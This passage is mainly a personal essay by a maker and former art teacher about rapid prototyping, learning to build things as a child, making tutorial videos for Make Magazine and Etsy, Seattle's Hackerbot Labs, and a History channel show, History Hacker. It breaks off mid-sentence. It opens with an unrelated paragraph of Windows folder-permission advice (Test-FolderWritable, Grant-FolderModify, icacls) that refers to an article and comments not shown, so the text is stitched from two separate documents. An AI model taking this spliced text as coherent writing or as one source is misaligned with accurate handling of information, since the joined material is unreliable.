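After the grant, log on as the restricted user and run Test-FolderWritable against the same path; $true confirms the ACL edit took, $false means an explicit Deny entry or a non-inheriting subfolder still blocks it, which is where the icacls /T walk in the final comment helps. The article's second approach (a dedicated restricted account for a shared program) uses the same Grant-FolderModify call with that account as -Identity; the shortcut's "Run As" setting then does the rest.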
We live in a time where there are no limits to creativity. If you can imagine it, you can make it. The technology of rapid prototyping is now at a stage where any object or project is in the realm of the possible. The hardware, machines, and robots that will do our bidding are waiting for people to put them to work in workshops and living rooms. The software for designing what you see in your head has never been easier to acquire and learn. We are truly in a renaissance of wonderful opportunities for people with an imagination. When I was a kid, rapid prototyping tools only existed on science fiction TV shows like The Jetsons and Star Trek. Things have changed since then.

I got hooked on repurposing technology and making things back when I was seven. My uncle, who made a living getting up early and prowling the trash of Boston looking for treasures to sell at weekend flea markets, taught me how to put together a working bike out of a bunch of broken bikes. Once I realized that I could take apart a bike and get it back together, I was obsessed with figuring out how things worked. At the library, I would settle into the 700 section and just read any books about how to make things. I daydreamed about growing up to be a mechanic with all the tools in my shop that I could ever want. A few years later in the early 80s, my parents had a software company producing children's software for the Apple II+ and the Commodore 64. I idolized the programmers as magicians controlling computing machines!

As an adult I've been making a living in one way or another by learning how to make something and teaching people what I've learned. I was an art teacher in Seattle Public Schools and my goal was to give young people as many different opportunities to get hooked on different artistic mediums of self expression. In the summers when I wasn't teaching I would set myself artistic challenges. My summertime rule was that if I couldn't get started making a project within a few days of having the idea, then I would abandon the idea. I learned drawing, painting, and ceramics skills by challenging myself this way.

Then one summer, I got obsessed with video blogging and started creating tutorial videos for my students and sharing videos online. This eventually turned into a job making tutorial videos for Make Magazine and Etsy.com. At the beginning of the week, I would set myself a task and have a tutorial video up by the end of the week. Some weeks had straightforward goals such as making a secret compartment book or a duct tape wallet, while other more ambitious projects required collaboration with the folks at the Seattle hacker space, Hackerbot Labs. Working with friends to create hovercrafts, drawing robots, and near space payloads were some of the best times of my life.

My web videos got the attention of mainstream media and I now have a TV show in the works called History Hacker. (The pilot aired in September on the History channel.) On the show, I explore the lives of inventors from history and remake their inventions in a way that's accessible to parents and kids. Until that goes into production, I've created a web series called Things and in it, I interview people about things that they have made.

Working on projects collaboratively is very satisfying. When I moved from Seattle to New York City in 2007, I needed a hacker space. I visited hacker spaces